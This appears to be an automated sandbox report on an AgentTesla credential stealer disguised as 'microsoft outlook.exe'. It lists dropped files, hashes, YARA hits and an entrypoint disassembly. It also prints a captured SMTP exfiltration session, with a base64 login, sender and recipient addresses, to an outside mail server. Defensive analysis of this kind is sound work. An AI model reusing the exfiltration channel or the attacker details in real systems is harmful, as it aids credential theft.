                            http://d8P2A6TrVo.netmicrosoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.560924455.0000000002868000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000003.505431063.00000000005E4000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipmicrosoft outlook.exe, microsoft outlook.exe, 00000003.00000000.297608589.0000000000414000.00000040.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.561213079.0000000003511000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.561417373.00000000049A2000.00000040.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.561338501.0000000004950000.00000004.00020000.sdmp, microsoft outlook.exe, 00000003.00000002.557953046.0000000000400000.00000040.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            192.185.25.212
                            cgyasc.comUnited States
                            46606UNIFIEDLAYER-AS-1UStrue

                            General Information

                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:553252
                            Start date:14.01.2022
                            Start time:15:06:20
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 8m 25s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:microsoft outlook.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:19
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.adwa.spyw.evad.winEXE@3/3@2/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 15.9% (good quality ratio 15%)
                            • Quality average: 79.1%
                            • Quality standard deviation: 29%
                            HCA Information:
                            • Successful, ratio: 81%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 13.107.42.16, 13.107.5.88
                            • Excluded domains from analysis (whitelisted): ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, ctldl.windowsupdate.com, e-0009.e-msedge.net, arc.msn.com, ris.api.iris.microsoft.com, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, config.edge.skype.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            15:07:29API Interceptor826x Sleep call for process: microsoft outlook.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN

                            No context

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Temp\175uaz481uk7obsbd
                            Process:C:\Users\user\Desktop\microsoft outlook.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):292863
                            Entropy (8bit):7.964166828002916
                            Encrypted:false
                            SSDEEP:6144:GZ44xksym1P6Xox+NPJmDAf1I9DzpFJnwsxQ7yJ9LhJwW:I4Z0c0+NW8ePpEsWmTx
                            MD5:6AD96963357FB04487B380570DAEEEAD
                            SHA1:7D809672FCF38815F48571D52CB3A7274BAA30E1
                            SHA-256:EF2509C21473CD39E1F926BE410596372F430E7BF402ACC7C41853708491FA1D
                            SHA-512:EE99C059C070ED426B47580A53180EEC6FC40A29EE2480FD1AC67D8EEFFAD48BA186C7FB5057387D9E88BDF84C1F53A693A96E31C16F3F99D01C4AA34066972B
                            Malicious:false
                            Reputation:low
                            Preview: B#........2.Q..J..(.99..{!......Ux!..G.]..L.qE.2..z c.g......=......&.tL. ...b.t.X...N..=...Wm...!?w.....Q.v........e{...6W.p....;..>U.5...2....J.d.j8..!.../..5h...j.i...o-......:.w.>Jq...p=...H..\...[@..H'......[..U1.0....MC$".s.B3......i.t..M....r.2.."..D.n(.99...{...F......Ux...G.EI.L.qE..2..c1....!......W..1. %Z...L..&..5-...*W._....... .`...<Y.LQ.v.....K.%._....?..xf{........t..._.7.!s.......O`....$.....d...Z.&e((.._{.p.W.Z..(".z0..hF8..x.wH......X.U.i.K.9.lbd#[,3......i9T......+b.2.p.pq..(O99...{!......T\..V..G....L.qE..2.. c1.....!.m.%...W.../].Z...:..&..5-............. .`*...Y.AP......K.%....W|.?...f{:......t..8_.....?...E..O`...D5=...P...d...Z.&e((.._T.p.W.Z..6B.z"..hF8..x.wH....k..X.U.i.K.9.lbd#[,3......i.t..M......2...pJ..(.99...{!......Ux!..G.]..L.qE.2. c1.....!.m.%...W.1k %Z...B..&^.5-....W......... .`*..Y.LQ.v.....K.%._.W0.?..xf{:......t..._.7.!s.......O`..D.........d...Z.&e((.._{.p.W.Z..6B.z"..hF8..x.wH....k..
                            C:\Users\user\AppData\Local\Temp\nsm4A2D.tmp\wbyrs.dll
                            Process:C:\Users\user\Desktop\microsoft outlook.exe
                            File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):179712
                            Entropy (8bit):5.887634079868767
                            Encrypted:false
                            SSDEEP:3072:Pjv/DLvAkNjGyy0M+zFsrOhH/7rsYVI6yzVwU2gcw8BZDptiwJn6RUJ7h+:PjfvAkFGy7gEf/ItWLpwsptiC6WJ7h+
                            MD5:913E09CBE93268D0D02BC82C1A15D2C6
                            SHA1:E2B5BDB8425450C42F358BB65EED76BBB9D494E3
                            SHA-256:A15F8C268F7DFBD6B2C0AEA83C52A7D5530C4CD8A10D2D1BF1F7BED97807E3C3
                            SHA-512:7D1B3DD83F603C1CCD6455EE4160D5C83EB25682D8BF509C59132E6BD8D21AB86572217258B25CA836FC818B0AA9EB91E694D19744003D7D9425D8340D9F6BA0
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Metadefender, Detection: 18%, Browse
                            • Antivirus: ReversingLabs, Detection: 81%
                            Reputation:low
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........O..AO..AO..A<.@@..AO..Aj..A...@N..A...@N..A..JAN..A...@N..ARichO..A................PE..L....g.a...........!......... .......................................................U....@....................................................................X....................................................................................text.............................. ..`.rdata..............................@..@.data...............................@....rsrc...............................@..B.reloc..X...........................@..B................................................................................................................................................................................................................................................................................................................................................
                            C:\Windows\System32\drivers\etc\hosts
                            Process:C:\Users\user\Desktop\microsoft outlook.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):835
                            Entropy (8bit):4.694294591169137
                            Encrypted:false
                            SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                            MD5:6EB47C1CF858E25486E42440074917F2
                            SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                            SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                            SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                            Malicious:true
                            Reputation:moderate, very likely benign file
                            Preview: # Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Entropy (8bit):7.485101457153222
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 92.16%
                            • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:microsoft outlook.exe
                            File size:577999
                            MD5:483994a69d86ec2e58ff6468cf049f89
                            SHA1:36b1d5e58de9734faa40fe218e415c57e902292e
                            SHA256:a51cdfc1b836895069dc0e2d8b7e15e13c65714d44278add6ab306061cdbc0c8
                            SHA512:006d7d6afa0dfd03f510dd2d19fd713e66a4bb046bd9ceb65390e8f536709705083dbf4a1f279243eb798737500cc72bd71f52ce110d2b6576b7aeac1d5f6c01
                            SSDEEP:12288:XdY27/O+fL4gy/LBIIvrn5wHUK7wobeAp44kjOYFB3GaeE4a:X//O+j47/L2IvrnMwtApNGOYFB3GaeEp
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.....

                            File Icon

                            Icon Hash:dcd8dbdaac98d2d0

                            Static PE Info

                            General

                            Entrypoint:0x4030e3
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                            DLL Characteristics:
                            Time Stamp:0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:7fa974366048f9c551ef45714595665e

                            Entrypoint Preview

                            Instruction
                            sub esp, 00000180h
                            push ebx
                            push ebp
                            push esi
                            xor ebx, ebx
                            push edi
                            mov dword ptr [esp+18h], ebx
                            mov dword ptr [esp+10h], 00409158h
                            xor esi, esi
                            mov byte ptr [esp+14h], 00000020h
                            call dword ptr [00407030h]
                            push 00008001h
                            call dword ptr [004070B0h]
                            push ebx
                            call dword ptr [0040727Ch]
                            push 00000008h
                            mov dword ptr [0042EC18h], eax
                            call 00007F05BC964F28h
                            mov dword ptr [0042EB64h], eax
                            push ebx
                            lea eax, dword ptr [esp+34h]
                            push 00000160h
                            push eax
                            push ebx
                            push 00428F90h
                            call dword ptr [00407158h]
                            push 0040914Ch
                            push 0042E360h
                            call 00007F05BC964BDFh
                            call dword ptr [004070ACh]
                            mov edi, 00434000h
                            push eax
                            push edi
                            call 00007F05BC964BCDh
                            push ebx
                            call dword ptr [0040710Ch]
                            cmp byte ptr [00434000h], 00000022h
                            mov dword ptr [0042EB60h], eax
                            mov eax, edi
                            jne 00007F05BC96240Ch
                            mov byte ptr [esp+14h], 00000022h
                            mov eax, 00434001h
                            push dword ptr [esp+14h]
                            push eax
                            call 00007F05BC9646C0h
                            push eax
                            call dword ptr [0040721Ch]
                            mov dword ptr [esp+1Ch], eax
                            jmp 00007F05BC962465h
                            cmp cl, 00000020h
                            jne 00007F05BC962408h
                            inc eax
                            cmp byte ptr [eax], 00000020h
                            je 00007F05BC9623FCh
                            cmp byte ptr [eax], 00000022h
                            mov byte ptr [eax+eax+00h], 00000000h

                            Rich Headers

                            Programming Language:
                            • [EXP] VC++ 6.0 SP5 build 8804

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x74b00xb4.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x27f88.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x5b680x5c00False0.67722486413data6.48746502716IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            .rdata0x70000x129c0x1400False0.4337890625data5.04904254867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x90000x25c580x400False0.58203125data4.76995537906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .rsrc0x370000x27f880x28000False0.334106445312data5.53647255605IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountry
                            RT_ICON0x372e00x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                            RT_ICON0x47b080x94a8dataEnglishUnited States
                            RT_ICON0x50fb00x5488dataEnglishUnited States
                            RT_ICON0x564380x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 248, next used block 520093696EnglishUnited States
                            RT_ICON0x5a6600x25a8dataEnglishUnited States
                            RT_ICON0x5cc080x10a8dataEnglishUnited States
                            RT_ICON0x5dcb00x988dataEnglishUnited States
                            RT_ICON0x5e6380x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_DIALOG0x5eaa00x100dataEnglishUnited States
                            RT_DIALOG0x5eba00x11cdataEnglishUnited States
                            RT_DIALOG0x5ecc00x60dataEnglishUnited States
                            RT_GROUP_ICON0x5ed200x76dataEnglishUnited States
                            RT_MANIFEST0x5ed980x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                            Imports

                            DLLImport
                            KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                            USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                            GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                            SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                            ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                            ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                            VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            01/14/22-15:09:05.620179TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49814587192.168.2.3192.185.25.212

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jan 14, 2022 15:09:01.728858948 CET49814587192.168.2.3192.185.25.212
                            Jan 14, 2022 15:09:01.870594978 CET58749814192.185.25.212192.168.2.3
                            Jan 14, 2022 15:09:01.870759964 CET49814587192.168.2.3192.185.25.212
                            Jan 14, 2022 15:09:04.714140892 CET58749814192.185.25.212192.168.2.3
                            Jan 14, 2022 15:09:04.715786934 CET49814587192.168.2.3192.185.25.212
                            Jan 14, 2022 15:09:04.857770920 CET58749814192.185.25.212192.168.2.3
                            Jan 14, 2022 15:09:04.860090017 CET49814587192.168.2.3192.185.25.212
                            Jan 14, 2022 15:09:05.002394915 CET58749814192.185.25.212192.168.2.3
                            Jan 14, 2022 15:09:05.003014088 CET49814587192.168.2.3192.185.25.212
                            Jan 14, 2022 15:09:05.147367954 CET58749814192.185.25.212192.168.2.3
                            Jan 14, 2022 15:09:05.149938107 CET49814587192.168.2.3192.185.25.212
                            Jan 14, 2022 15:09:05.291701078 CET58749814192.185.25.212192.168.2.3
                            Jan 14, 2022 15:09:05.292252064 CET49814587192.168.2.3192.185.25.212
                            Jan 14, 2022 15:09:05.474204063 CET58749814192.185.25.212192.168.2.3
                            Jan 14, 2022 15:09:05.476167917 CET58749814192.185.25.212192.168.2.3
                            Jan 14, 2022 15:09:05.476649046 CET49814587192.168.2.3192.185.25.212
                            Jan 14, 2022 15:09:05.618309975 CET58749814192.185.25.212192.168.2.3
                            Jan 14, 2022 15:09:05.618387938 CET58749814192.185.25.212192.168.2.3
                            Jan 14, 2022 15:09:05.620178938 CET49814587192.168.2.3192.185.25.212
                            Jan 14, 2022 15:09:05.620332003 CET49814587192.168.2.3192.185.25.212
                            Jan 14, 2022 15:09:05.620893955 CET49814587192.168.2.3192.185.25.212
                            Jan 14, 2022 15:09:05.620975018 CET49814587192.168.2.3192.185.25.212
                            Jan 14, 2022 15:09:05.762295961 CET58749814192.185.25.212192.168.2.3
                            Jan 14, 2022 15:09:05.762422085 CET58749814192.185.25.212192.168.2.3
                            Jan 14, 2022 15:09:05.763362885 CET58749814192.185.25.212192.168.2.3
                            Jan 14, 2022 15:09:05.808962107 CET49814587192.168.2.3192.185.25.212

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jan 14, 2022 15:09:01.313389063 CET4955953192.168.2.38.8.8.8
                            Jan 14, 2022 15:09:01.467282057 CET53495598.8.8.8192.168.2.3
                            Jan 14, 2022 15:09:01.485635996 CET5265053192.168.2.38.8.8.8
                            Jan 14, 2022 15:09:01.656233072 CET53526508.8.8.8192.168.2.3

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Jan 14, 2022 15:09:01.313389063 CET192.168.2.38.8.8.80xd612Standard query (0)mail.cgyasc.comA (IP address)IN (0x0001)
                            Jan 14, 2022 15:09:01.485635996 CET192.168.2.38.8.8.80x3db3Standard query (0)mail.cgyasc.comA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Jan 14, 2022 15:09:01.467282057 CET8.8.8.8192.168.2.30xd612No error (0)mail.cgyasc.comcgyasc.comCNAME (Canonical name)IN (0x0001)
                            Jan 14, 2022 15:09:01.467282057 CET8.8.8.8192.168.2.30xd612No error (0)cgyasc.com192.185.25.212A (IP address)IN (0x0001)
                            Jan 14, 2022 15:09:01.656233072 CET8.8.8.8192.168.2.30x3db3No error (0)mail.cgyasc.comcgyasc.comCNAME (Canonical name)IN (0x0001)
                            Jan 14, 2022 15:09:01.656233072 CET8.8.8.8192.168.2.30x3db3No error (0)cgyasc.com192.185.25.212A (IP address)IN (0x0001)

                            SMTP Packets

                            TimestampSource PortDest PortSource IPDest IPCommands
                            Jan 14, 2022 15:09:04.714140892 CET58749814192.185.25.212192.168.2.3220-elise.websitewelcome.com ESMTP Exim 4.94.2 #2 Fri, 14 Jan 2022 08:09:04 -0600
                            220-We do not authorize the use of this system to transport unsolicited,
                            220 and/or bulk e-mail.
                            Jan 14, 2022 15:09:04.715786934 CET49814587192.168.2.3192.185.25.212EHLO 172892
                            Jan 14, 2022 15:09:04.857770920 CET58749814192.185.25.212192.168.2.3250-elise.websitewelcome.com Hello 172892 [84.17.52.18]
                            250-SIZE 52428800
                            250-8BITMIME
                            250-PIPELINING
                            250-PIPE_CONNECT
                            250-AUTH PLAIN LOGIN
                            250-STARTTLS
                            250 HELP
                            Jan 14, 2022 15:09:04.860090017 CET49814587192.168.2.3192.185.25.212AUTH login Y2FzdGlsbG9vQGNneWFzYy5jb20=
                            Jan 14, 2022 15:09:05.002394915 CET58749814192.185.25.212192.168.2.3334 UGFzc3dvcmQ6
                            Jan 14, 2022 15:09:05.147367954 CET58749814192.185.25.212192.168.2.3235 Authentication succeeded
                            Jan 14, 2022 15:09:05.149938107 CET49814587192.168.2.3192.185.25.212MAIL FROM:<castilloo@cgyasc.com>
                            Jan 14, 2022 15:09:05.291701078 CET58749814192.185.25.212192.168.2.3250 OK
                            Jan 14, 2022 15:09:05.292252064 CET49814587192.168.2.3192.185.25.212RCPT TO:<mamaputmamaput175@gmail.com>
                            Jan 14, 2022 15:09:05.476167917 CET58749814192.185.25.212192.168.2.3250 Accepted
                            Jan 14, 2022 15:09:05.476649046 CET49814587192.168.2.3192.185.25.212DATA
                            Jan 14, 2022 15:09:05.618387938 CET58749814192.185.25.212192.168.2.3354 Enter message, ending with "." on a line by itself
                            Jan 14, 2022 15:09:05.620975018 CET49814587192.168.2.3192.185.25.212.
                            Jan 14, 2022 15:09:05.763362885 CET58749814192.185.25.212192.168.2.3250 OK id=1n8NGL-000oD2-Hb

                            Code Manipulations

                            Statistics

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Start time:15:07:16
                            Start date:14/01/2022
                            Path:C:\Users\user\Desktop\microsoft outlook.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\microsoft outlook.exe"
                            Imagebase:0x400000
                            File size:577999 bytes
                            MD5 hash:483994A69D86EC2E58FF6468CF049F89
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.300252799.0000000002430000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.300252799.0000000002430000.00000004.00000001.sdmp, Author: Joe Security
                            Reputation:low

                            General

                            Start time:15:07:17
                            Start date:14/01/2022
                            Path:C:\Users\user\Desktop\microsoft outlook.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\microsoft outlook.exe"
                            Imagebase:0x400000
                            File size:577999 bytes
                            MD5 hash:483994A69D86EC2E58FF6468CF049F89
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.297608589.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.297608589.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.561417373.00000000049A2000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.561417373.00000000049A2000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.561213079.0000000003511000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.561213079.0000000003511000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.298689668.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.298689668.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000001.299532186.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000001.299532186.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.561338501.0000000004950000.00000004.00020000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.561338501.0000000004950000.00000004.00020000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.558241910.00000000004CA000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.558241910.00000000004CA000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.557953046.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.557953046.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            Reputation:low

                            Disassembly

                            Code Analysis

                            Reset < >